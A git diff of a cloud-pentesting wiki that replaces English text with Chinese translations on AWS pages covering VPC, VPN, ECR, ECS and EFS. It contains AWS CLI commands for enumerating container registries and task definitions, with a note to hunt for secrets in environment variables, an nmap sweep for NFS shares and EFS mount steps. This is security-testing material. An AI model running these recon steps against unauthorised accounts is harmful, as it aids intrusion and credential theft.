### Elastic IP Addresses -An _Elastic IP address_ is a **static IPv4 address** designed for dynamic cloud computing. An Elastic IP address is allocated to your AWS account, and is yours until you release it. By using an Elastic IP address, you can mask the failure of an instance or software by rapidly remapping the address to another instance in your account. +一个 _弹性 IP 地址_ 是一个 **静态 IPv4 地址**,旨在用于动态云计算。弹性 IP 地址分配给您的 AWS 账户,并且在您释放之前属于您。通过使用弹性 IP 地址,您可以通过快速重新映射地址到您账户中的另一个实例来掩盖实例或软件的故障。 ### Connection between subnets -By default, all subnets have the **automatic assigned of public IP addresses turned off** but it can be turned on. +默认情况下,所有子网的 **自动分配公共 IP 地址已关闭**,但可以打开。 -**A local route within a route table enables communication between VPC subnets.** +**路由表中的本地路由使 VPC 子网之间的通信成为可能。** -If you are **connection a subnet with a different subnet you cannot access the subnets connected** with the other subnet, you need to create connection with them directly. **This also applies to internet gateways**. You cannot go through a subnet connection to access internet, you need to assign the internet gateway to your subnet. +如果您 **连接一个子网与另一个子网,您无法访问与其他子网连接的子网,您需要直接与它们建立连接**。**这也适用于互联网网关**。您不能通过子网连接访问互联网,您需要将互联网网关分配给您的子网。 ### VPC Peering -VPC peering allows you to **connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network. +VPC 对等连接允许您 **将两个或多个 VPC 连接在一起**,使用 IPV4 或 IPV6,就像它们是同一网络的一部分。 -Once the peer connectivity is established, **resources in one VPC can access resources in the other**. The connectivity between the VPCs is implemented through the existing AWS network infrastructure, and so it is highly available with no bandwidth bottleneck. As **peered connections operate as if they were part of the same network**, there are restrictions when it comes to your CIDR block ranges that can be used.\ -If you have **overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together.\ -Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 could communicate with each other directly, as can VPC 2 and VPC 3, however, VPC 1 and VPC 3 could not. **You can't route through one VPC to get to another.** +一旦建立对等连接,**一个 VPC 中的资源可以访问另一个 VPC 中的资源**。VPC 之间的连接通过现有的 AWS 网络基础设施实现,因此它是高度可用的,没有带宽瓶颈。由于 **对等连接的操作就像它们是同一网络的一部分**,因此在使用 CIDR 块范围时有一些限制。\ +如果您的 VPC 有 **重叠或重复的 CIDR** 范围,那么 **您将无法将 VPC 对等连接在一起**。\ +每个 AWS VPC **只与其对等连接通信**。例如,如果您在 VPC 1 和 VPC 2 之间有一个对等连接,在 VPC 2 和 VPC 3 之间有另一个连接,如所示,则 VPC 1 和 VPC 2 可以直接相互通信,VPC 2 和 VPC 3 也可以相互通信,但 VPC 1 和 VPC 3 不能。**您不能通过一个 VPC 路由到另一个 VPC。** ### **VPC Flow Logs** -Within your VPC, you could potentially have hundreds or even thousands of resources all communicating between different subnets both public and private and also between different VPCs through VPC peering connections. **VPC Flow Logs allow you to capture IP traffic information that flows between your network interfaces of your resources within your VPC**. +在您的 VPC 中,您可能会有数百或甚至数千个资源在不同的公共和私有子网之间以及通过 VPC 对等连接在不同的 VPC 之间进行通信。**VPC Flow Logs 允许您捕获在 VPC 内资源的网络接口之间流动的 IP 流量信息**。 -Unlike S3 access logs and CloudFront access logs, the **log data generated by VPC Flow Logs is not stored in S3. Instead, the log data captured is sent to CloudWatch logs**. +与 S3 访问日志和 CloudFront 访问日志不同,**VPC Flow Logs 生成的日志数据不会存储在 S3 中。相反,捕获的日志数据会发送到 CloudWatch 日志**。 -Limitations: +限制: -- If you are running a VPC peered connection, then you'll only be able to see flow logs of peered VPCs that are within the same account. -- If you are still running resources within the EC2-Classic environment, then unfortunately you are not able to retrieve information from their interfaces -- Once a VPC Flow Log has been created, it cannot be changed. To alter the VPC Flow Log configuration, you need to delete it and then recreate a new one. -- The following traffic is not monitored and captured by the logs. DHCP traffic within the VPC, traffic from instances destined for the Amazon DNS Server. -- Any traffic destined to the IP address for the VPC default router and traffic to and from the following addresses, 169.254.169.254 which is used for gathering instance metadata, and 169.254.169.123 which is used for the Amazon Time Sync Service. -- Traffic relating to an Amazon Windows activation license from a Windows instance -- Traffic between a network load balancer interface and an endpoint network interface +- 如果您正在运行 VPC 对等连接,则您只能查看同一账户内对等 VPC 的流量日志。 +- 如果您仍在 EC2-Classic 环境中运行资源,那么不幸的是,您无法从它们的接口检索信息。 +- 一旦创建了 VPC Flow Log,就无法更改。要更改 VPC Flow Log 配置,您需要删除它,然后重新创建一个新的。 +- 以下流量不受日志监控和捕获。VPC 内的 DHCP 流量,目标为亚马逊 DNS 服务器的实例流量。 +- 任何目标为 VPC 默认路由器的 IP 地址的流量,以及与以下地址之间的流量,169.254.169.254 用于收集实例元数据,169.254.169.123 用于亚马逊时间同步服务。 +- 与 Windows 实例的亚马逊 Windows 激活许可证相关的流量。 +- 网络负载均衡器接口与端点网络接口之间的流量。 -For every network interface that publishes data to the CloudWatch log group, it will use a different log stream. And within each of these streams, there will be the flow log event data that shows the content of the log entries. Each of these **logs captures data during a window of approximately 10 to 15 minutes**. +对于每个向 CloudWatch 日志组发布数据的网络接口,它将使用不同的日志流。在每个这些流中,将有流日志事件数据,显示日志条目的内容。每个这些 **日志在大约 10 到 15 分钟的窗口期间捕获数据**。 ## VPN ### Basic AWS VPN Components -1. **Customer Gateway**: - - A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection. - - It is essentially a physical device or software application on your side of the Site-to-Site VPN connection. - - You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway. - - It serves as a reference point for setting up the VPN connection and doesn't incur additional charges. -2. **Virtual Private Gateway**: - - A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection. - - It is attached to your VPC and serves as the target for your VPN connection. - - VPG is the AWS side endpoint for the VPN connection. - - It handles the secure communication between your VPC and your on-premises network. -3. **Site-to-Site VPN Connection**: - - A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel. - - This type of connection requires a Customer Gateway and a Virtual Private Gateway. - - It's used for secure, stable, and consistent communication between your data center or network and your AWS environment. - - Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection. -4. **Client VPN Endpoint**: - - A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions. - - It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network. - - It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks. - - With Client VPN, each client device uses a VPN client software to establish a secure connection. +1. **客户网关**: +- 客户网关是您在 AWS 中创建的资源,用于表示您一侧的 VPN 连接。 +- 它本质上是您一侧的站点到站点 VPN 连接上的物理设备或软件应用程序。 +- 您向 AWS 提供路由信息和网络设备的公共 IP 地址(如路由器或防火墙),以创建客户网关。 +- 它作为设置 VPN 连接的参考点,不会产生额外费用。 +2. **虚拟私有网关**: +- 虚拟私有网关(VPG)是站点到站点 VPN 连接的亚马逊侧的 VPN 集中器。 +- 它附加到您的 VPC,并作为您的 VPN 连接的目标。 +- VPG 是 VPN 连接的 AWS 侧端点。 +- 它处理您 VPC 与本地网络之间的安全通信。 +3. **站点到站点 VPN 连接**: +- 站点到站点 VPN 连接通过安全的 IPsec VPN 隧道将您的本地网络连接到 VPC。 +- 这种类型的连接需要客户网关和虚拟私有网关。 +- 它用于在您的数据中心或网络与您的 AWS 环境之间进行安全、稳定和一致的通信。 +- 通常用于常规、长期连接,并根据通过连接传输的数据量计费。 +4. **客户端 VPN 端点**: +- 客户端 VPN 端点是您在 AWS 中创建的资源,用于启用和管理客户端 VPN 会话。 +- 它用于允许单个设备(如笔记本电脑、智能手机等)安全连接到 AWS 资源或您的本地网络。 +- 它与站点到站点 VPN 的不同之处在于,它是为单个客户端设计的,而不是连接整个网络。 +- 使用客户端 VPN,每个客户端设备使用 VPN 客户端软件建立安全连接。 ### Site-to-Site VPN -**Connect your on premisses network with your VPC.** +**将您的本地网络与您的 VPC 连接。** -- **VPN connection**: A secure connection between your on-premises equipment and your VPCs. -- **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS. +- **VPN 连接**:您本地设备与您的 VPC 之间的安全连接。 +- **VPN 隧道**:一个加密链接,数据可以从客户网络传输到 AWS 或从 AWS 传输到客户网络。 - Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability. +每个 VPN 连接包括两个 VPN 隧道,您可以同时使用它们以实现高可用性。 -- **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device. -- **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection. -- **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. -- **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. +- **客户网关**:一个 AWS 资源,向 AWS 提供有关您的客户网关设备的信息。 +- **客户网关设备**:您一侧的站点到站点 VPN 连接上的物理设备或软件应用程序。 +- **虚拟私有网关**:站点到站点 VPN 连接的亚马逊侧的 VPN 集中器。您使用虚拟私有网关或传输网关作为站点到站点 VPN 连接的亚马逊侧网关。 +- **传输网关**:一个传输中心,可用于互连您的 VPC 和本地网络。您使用传输网关或虚拟私有网关作为站点到站点 VPN 连接的亚马逊侧网关。 #### Limitations -- IPv6 traffic is not supported for VPN connections on a virtual private gateway. -- An AWS VPN connection does not support Path MTU Discovery. +- 虚拟私有网关不支持 VPN 连接的 IPv6 流量。 +- AWS VPN 连接不支持路径 MTU 发现。 -In addition, take the following into consideration when you use Site-to-Site VPN. +此外,在使用站点到站点 VPN 时,请考虑以下事项。 -- When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks. +- 当将您的 VPC 连接到公共本地网络时,我们建议您为您的网络使用不重叠的 CIDR 块。 ### Client VPN -**Connect from your machine to your VPC** +**从您的机器连接到您的 VPC** #### Concepts -- **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated. -- **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone. -- **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks. -- **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks. -- **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session. -- **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`. -- **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443. -- **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address. -- **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues. -- **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client. +- **客户端 VPN 端点**:您创建和配置的资源,以启用和管理客户端 VPN 会话。它是所有客户端 VPN 会话终止的资源。 +- **目标网络**:目标网络是您与客户端 VPN 端点关联的网络。**VPC 的一个子网是目标网络**。将子网与客户端 VPN 端点关联使您能够建立 VPN 会话。您可以将多个子网与客户端 VPN 端点关联以实现高可用性。所有子网必须来自同一 VPC。每个子网必须属于不同的可用区。 +- **路由**:每个客户端 VPN 端点都有一个路由表,描述可用的目标网络路由。路由表中的每个路由指定特定资源或网络的流量路径。 +- **授权规则**:授权规则 **限制可以访问网络的用户**。对于指定的网络,您配置允许访问的活动目录或身份提供者(IdP)组。只有属于该组的用户才能访问指定的网络。**默认情况下,没有授权规则**,您必须配置授权规则以使用户能够访问资源和网络。 +- **客户端**:连接到客户端 VPN 端点以建立 VPN 会话的最终用户。最终用户需要下载 OpenVPN 客户端,并使用您创建的客户端 VPN 配置文件建立 VPN 会话。 +- **客户端 CIDR 范围**:用于分配客户端 IP 地址的 IP 地址范围。每个连接到客户端 VPN 端点的连接都从客户端 CIDR 范围中分配一个唯一的 IP 地址。您选择客户端 CIDR 范围,例如 `10.2.0.0/16`。 +- **客户端 VPN 端口**:AWS 客户端 VPN 支持端口 443 和 1194 的 TCP 和 UDP。默认是端口 443。 +- **客户端 VPN 网络接口**:当您将子网与客户端 VPN 端点关联时,我们会在该子网中创建客户端 VPN 网络接口。**从客户端 VPN 端点发送到 VPC 的流量通过客户端 VPN 网络接口发送**。然后应用源网络地址转换(SNAT),将客户端 CIDR 范围中的源 IP 地址转换为客户端 VPN 网络接口 IP 地址。 +- **连接日志**:您可以为客户端 VPN 端点启用连接日志以记录连接事件。您可以使用此信息进行取证,分析客户端 VPN 端点的使用情况或调试连接问题。 +- **自助服务门户**:您可以为客户端 VPN 端点启用自助服务门户。客户端可以使用其凭据登录基于 Web 的门户,并下载客户端 VPN 端点配置文件的最新版本,或 AWS 提供的客户端的最新版本。 #### Limitations -- **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table. -- Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.** -- A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint. -- The **client CIDR range cannot be changed** after you create the Client VPN endpoint. -- The **subnets** associated with a Client VPN endpoint **must be in the same VPC**. -- You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**. -- A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**. -- Client VPN supports **IPv4** traffic only. -- Client VPN is **not** Federal Information Processing Standards (**FIPS**) **compliant**. -- If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format. +- **客户端 CIDR 范围不能与关联子网所在 VPC 的本地 CIDR 重叠**,或与手动添加到客户端 VPN 端点路由表的任何路由重叠。 +- 客户端 CIDR 范围的块大小必须至少为 **/22**,且 **不得大于 /12**。 +- 客户端 CIDR 范围中的 **一部分地址** 用于 **支持客户端 VPN 端点的可用性** 模型,不能分配给客户端。因此,我们建议您 **分配一个包含所需的最大并发连接数的两倍 IP 地址的 CIDR 块**,以支持您计划在客户端 VPN 端点上支持的最大并发连接数。 +- 创建客户端 VPN 端点后,**客户端 CIDR 范围无法更改**。 +- 与客户端 VPN 端点关联的 **子网必须在同一 VPC 中**。 +- 您 **不能将来自同一可用区的多个子网与客户端 VPN 端点关联**。 +- 客户端 VPN 端点 **不支持专用租用 VPC 中的子网关联**。 +- 客户端 VPN 仅支持 **IPv4** 流量。 +- 客户端 VPN **不** 符合联邦信息处理标准(**FIPS**)的 **合规性**。 +- 如果您的活动目录禁用了多因素身份验证(MFA),则用户密码不能采用以下格式。 - ``` - SCRV1:: - ``` +``` +SCRV1:: +``` -- The self-service portal is **not available for clients that authenticate using mutual authentication**. +- 自助服务门户 **不适用于使用互认证进行身份验证的客户端**。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md index 9025829b4..f8568e5b5 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md @@ -6,49 +6,48 @@ ### ECR -#### Basic Information +#### 基本信息 -Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images. +Amazon **Elastic Container Registry** (Amazon ECR) 是一个 **托管的容器镜像注册服务**。它旨在提供一个环境,客户可以使用众所周知的接口与他们的容器镜像进行交互。具体来说,支持使用 Docker CLI 或任何首选客户端,进行推送、拉取和管理容器镜像等活动。 -ECR is compose by 2 types of objects: **Registries** and **Repositories**. +ECR 由两种类型的对象组成:**注册表**和**仓库**。 -**Registries** +**注册表** -Every AWS account has 2 registries: **Private** & **Public**. +每个 AWS 账户有两个注册表:**私有**和**公共**。 -1. **Private Registries**: +1. **私有注册表**: -- **Private by default**: The container images stored in an Amazon ECR private registry are **only accessible to authorized users** within your AWS account or to those who have been granted permission. - - The URI of a **private repository** follows the format `.dkr.ecr..amazonaws.com/` -- **Access control**: You can **control access** to your private container images using **IAM policies**, and you can configure fine-grained permissions based on users or roles. -- **Integration with AWS services**: Amazon ECR private registries can be easily **integrated with other AWS services**, such as EKS, ECS... -- **Other private registry options**: - - The Tag immutability column lists its status, if tag immutability is enabled it will **prevent** image **pushes** with **pre-existing tags** from overwriting the images. - - The **Encryption type** column lists the encryption properties of the repository, it shows the default encryption types such as AES-256, or has **KMS** enabled encryptions. - - The **Pull through cache** column lists its status, if Pull through cache status is Active it will cache **repositories in an external public repository into your private repository**. - - Specific **IAM policies** can be configured to grant different **permissions**. - - The **scanning configuration** allows to scan for vulnerabilities in the images stored inside the repo. +- **默认私有**:存储在 Amazon ECR 私有注册表中的容器镜像 **仅对您 AWS 账户内的授权用户** 或已获得权限的用户可访问。 +- **私有仓库**的 URI 格式为 `.dkr.ecr..amazonaws.com/` +- **访问控制**:您可以使用 **IAM 策略**来 **控制对私有容器镜像的访问**,并可以根据用户或角色配置细粒度权限。 +- **与 AWS 服务的集成**:Amazon ECR 私有注册表可以轻松与其他 AWS 服务集成,如 EKS、ECS... +- **其他私有注册表选项**: +- 标签不可变性列显示其状态,如果启用标签不可变性,它将 **防止** 使用 **已存在标签** 的镜像 **推送** 覆盖镜像。 +- **加密类型**列列出仓库的加密属性,显示默认加密类型,如 AES-256,或启用 **KMS** 加密。 +- **拉取缓存**列显示其状态,如果拉取缓存状态为活动,它将把 **外部公共仓库中的仓库缓存到您的私有仓库**。 +- 可以配置特定的 **IAM 策略**以授予不同的 **权限**。 +- **扫描配置**允许扫描存储在仓库中的镜像中的漏洞。 -2. **Public Registries**: +2. **公共注册表**: -- **Public accessibility**: Container images stored in an ECR Public registry are **accessible to anyone on the internet without authentication.** - - The URI of a **public repository** is like `public.ecr.aws//`. Although the `` part can be changed by the admin to another string easier to remember. +- **公共可访问性**:存储在 ECR 公共注册表中的容器镜像 **对互联网的任何人可访问,无需身份验证**。 +- **公共仓库**的 URI 类似于 `public.ecr.aws//`。虽然 `` 部分可以由管理员更改为更易记的字符串。 -**Repositories** +**仓库** -These are the **images** that in the **private registry** or to the **public** one. +这些是 **私有注册表**或 **公共** 注册表中的 **镜像**。 > [!NOTE] -> Note that in order to upload an image to a repository, the **ECR repository need to have the same name as the image**. +> 请注意,为了将镜像上传到仓库,**ECR 仓库需要与镜像同名**。 -#### Registry & Repository Policies +#### 注册表和仓库策略 -**Registries & repositories** also have **policies that can be used to grant permissions to other principals/accounts**. For example, in the following repository policy image you can see how any user from the whole organization will be able to access the image: +**注册表和仓库** 也有 **可以用于授予其他主体/账户权限的策略**。例如,在以下仓库策略图像中,您可以看到整个组织中的任何用户都将能够访问该镜像:
-#### Enumeration - +#### 枚举 ```bash # Get repos aws ecr describe-repositories @@ -68,39 +67,34 @@ aws ecr-public describe-repositories aws ecr get-registry-policy aws ecr get-repository-policy --repository-name ``` - -#### Unauthenticated Enum +#### 未认证枚举 {{#ref}} ../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md {{#endref}} -#### Privesc +#### 权限提升 -In the following page you can check how to **abuse ECR permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用 ECR 权限以提升权限**: {{#ref}} ../aws-privilege-escalation/aws-ecr-privesc.md {{#endref}} -#### Post Exploitation +#### 利用后 {{#ref}} ../aws-post-exploitation/aws-ecr-post-exploitation.md {{#endref}} -#### Persistence +#### 持久性 {{#ref}} ../aws-persistence/aws-ecr-persistence.md {{#endref}} -## References +## 参考 - [https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md index cbbf596fe..1e47ff3b4 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md @@ -4,31 +4,30 @@ ## ECS -### Basic Information +### 基本信息 -Amazon **Elastic Container Services** or ECS provides a platform to **host containerized applications in the cloud**. ECS has two **deployment** methods, **EC2** instance type and a **serverless** option, **Fargate**. The service **makes running containers in the cloud very easy and pain free**. +亚马逊 **弹性容器服务**(ECS)提供了一个 **在云中托管容器化应用程序** 的平台。ECS 有两种 **部署** 方法,**EC2** 实例类型和 **无服务器** 选项 **Fargate**。该服务 **使在云中运行容器变得非常简单且无痛**。 -ECS operates using the following three building blocks: **Clusters**, **Services**, and **Task Definitions**. +ECS 使用以下三个构建块进行操作:**集群**、**服务** 和 **任务定义**。 -- **Clusters** are **groups of containers** that are running in the cloud. As previously mentioned, there are two launch types for containers, EC2 and Fargate. AWS defines the **EC2** launch type as allowing customers “to run \[their] containerized applications on a cluster of Amazon EC2 instances that \[they] **manage**”. **Fargate** is similar and is defined as “\[allowing] you to run your containerized applications **without the need to provision and manage** the backend infrastructure”. -- **Services** are created inside a cluster and responsible for **running the tasks**. Inside a service definition **you define the number of tasks to run, auto scaling, capacity provider (Fargate/EC2/External),** **networking** information such as VPC’s, subnets, and security groups. - - There **2 types of applications**: - - **Service**: A group of tasks handling a long-running computing work that can be stopped and restarted. For example, a web application. - - **Task**: A standalone task that runs and terminates. For example, a batch job. - - Among the service applications, there are **2 types of service schedulers**: - - [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): The replica scheduling strategy places and **maintains the desired number** of tasks across your cluster. If for some reason a task shut down, a new one is launched in the same or different node. - - [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Deploys exactly one task on each active container instance that has the needed requirements. There is no need to specify a desired number of tasks, a task placement strategy, or use Service Auto Scaling policies. -- **Task Definitions** are responsible for **defining what containers will run** and the various parameters that will be configured with the containers such as **port mappings** with the host, **env variables**, Docker **entrypoint**... - - Check **env variables for sensitive info**! +- **集群** 是 **在云中运行的容器组**。如前所述,容器有两种启动类型,EC2 和 Fargate。AWS 将 **EC2** 启动类型定义为允许客户“在他们 **管理** 的 Amazon EC2 实例集群上运行他们的容器化应用程序”。**Fargate** 类似,被定义为“\[允许\] 您运行您的容器化应用程序 **而无需配置和管理** 后端基础设施”。 +- **服务** 在集群内创建,负责 **运行任务**。在服务定义中 **您定义要运行的任务数量、自动扩展、容量提供者(Fargate/EC2/External)、** **网络** 信息,如 VPC、子网和安全组。 +- 有 **2 种类型的应用程序**: +- **服务**:处理可以停止和重新启动的长期计算工作的任务组。例如,一个 web 应用程序。 +- **任务**:独立运行并终止的任务。例如,一个批处理作业。 +- 在服务应用程序中,有 **2 种类型的服务调度器**: +- [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html):副本调度策略在您的集群中放置并 **维护所需数量** 的任务。如果由于某种原因任务关闭,则在同一或不同节点上启动一个新任务。 +- [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html):在每个具有所需要求的活动容器实例上部署一个任务。无需指定所需的任务数量、任务放置策略或使用服务自动扩展策略。 +- **任务定义** 负责 **定义将运行的容器** 以及与容器配置的各种参数,如 **与主机的端口映射**、**环境变量**、Docker **入口点**... +- 检查 **环境变量以获取敏感信息**! -### Sensitive Data In Task Definitions +### 任务定义中的敏感数据 -Task definitions are responsible for **configuring the actual containers that will be running in ECS**. Since task definitions define how containers will run, a plethora of information can be found within. +任务定义负责 **配置将在 ECS 中运行的实际容器**。由于任务定义定义了容器的运行方式,因此可以找到大量信息。 -Pacu can enumerate ECS (list-clusters, list-container-instances, list-services, list-task-definitions), it can also dump task definitions. - -### Enumeration +Pacu 可以枚举 ECS(list-clusters、list-container-instances、list-services、list-task-definitions),它还可以转储任务定义。 +### 枚举 ```bash # Clusters info aws ecs list-clusters @@ -52,35 +51,30 @@ aws ecs describe-tasks --cluster --tasks ## Look for env vars and secrets used from the task definition aws ecs describe-task-definition --task-definition : ``` - -### Unauthenticated Access +### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md {{#endref}} -### Privesc +### 权限提升 -In the following page you can check how to **abuse ECS permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用ECS权限以提升权限**: {{#ref}} ../aws-privilege-escalation/aws-ecs-privesc.md {{#endref}} -### Post Exploitation +### 利用后 {{#ref}} ../aws-post-exploitation/aws-ecs-post-exploitation.md {{#endref}} -### Persistence +### 持久性 {{#ref}} ../aws-persistence/aws-ecs-persistence.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md index bcf4e58d4..b890442d2 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md @@ -4,22 +4,21 @@ ## EFS -### Basic Information +### 基本信息 -Amazon Elastic File System (EFS) is presented as a **fully managed, scalable, and elastic network file system** by AWS. The service facilitates the creation and configuration of **file systems** that can be concurrently accessed by multiple EC2 instances and other AWS services. The key features of EFS include its ability to automatically scale without manual intervention, provision low-latency access, support high-throughput workloads, guarantee data durability, and seamlessly integrate with various AWS security mechanisms. +Amazon Elastic File System (EFS) 被 AWS 视为一个 **完全托管、可扩展和弹性的网络文件系统**。该服务便于创建和配置 **文件系统**,这些文件系统可以被多个 EC2 实例和其他 AWS 服务同时访问。EFS 的主要特点包括能够在无需人工干预的情况下自动扩展,提供低延迟访问,支持高吞吐量工作负载,保证数据持久性,并与各种 AWS 安全机制无缝集成。 -By **default**, the EFS folder to mount will be **`/`** but it could have a **different name**. +默认情况下,EFS 挂载的文件夹将是 **`/`**,但它可以有 **不同的名称**。 -### Network Access +### 网络访问 -An EFS is created in a VPC and would be **by default accessible in all the VPC subnetworks**. However, the EFS will have a Security Group. In order to **give access to an EC2** (or any other AWS service) to mount the EFS, it’s needed to **allow in the EFS security group an inbound NFS** (2049 port) **rule from the EC2 Security Group**. +EFS 是在 VPC 中创建的,默认情况下可以 **在所有 VPC 子网中访问**。然而,EFS 将具有一个安全组。为了 **允许 EC2**(或任何其他 AWS 服务)挂载 EFS,需要 **在 EFS 安全组中允许来自 EC2 安全组的入站 NFS**(2049 端口)**规则**。 -Without this, you **won't be able to contact the NFS service**. +没有这个,您 **将无法联系 NFS 服务**。 -For more information about how to do this check: [https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount](https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount) - -### Enumeration +有关如何做到这一点的更多信息,请查看:[https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount](https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount) +### 枚举 ```bash # Get filesystems and access policies (if any) aws efs describe-file-systems @@ -39,12 +38,10 @@ aws efs describe-replication-configurations # Search for NFS in EC2 networks sudo nmap -T4 -Pn -p 2049 --open 10.10.10.0/20 # or /16 to be sure ``` - > [!CAUTION] -> It might be that the EFS mount point is inside the same VPC but in a different subnet. If you want to be sure you find all **EFS points it would be better to scan the `/16` netmask**. +> EFS挂载点可能在同一个VPC内,但在不同的子网中。如果您想确保找到所有**EFS点,最好扫描`/16`子网掩码**。 ### Mount EFS - ```bash sudo mkdir /efs @@ -58,70 +55,63 @@ sudo yum install amazon-efs-utils # If centos sudo apt-get install amazon-efs-utils # If ubuntu sudo mount -t efs :/ /efs/ ``` +### IAM 访问 -### IAM Access - -By **default** anyone with **network access to the EFS** will be able to mount, **read and write it even as root user**. However, File System policies could be in place **only allowing principals with specific permissions** to access it.\ -For example, this File System policy **won't allow even to mount** the file system if you **don't have the IAM permission**: - +默认情况下,任何具有对 EFS 的网络访问的人都能够挂载、读取和写入它,即使是根用户。然而,文件系统策略可能会限制**仅允许具有特定权限的主体**访问它。\ +例如,如果您**没有 IAM 权限**,则此文件系统策略**甚至不允许挂载**文件系统: ```json { - "Version": "2012-10-17", - "Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797", - "Statement": [ - { - "Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "", - "Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018", - "Condition": { - "Bool": { - "elasticfilesystem:AccessedViaMountTarget": "true" - } - } - } - ] +"Version": "2012-10-17", +"Id": 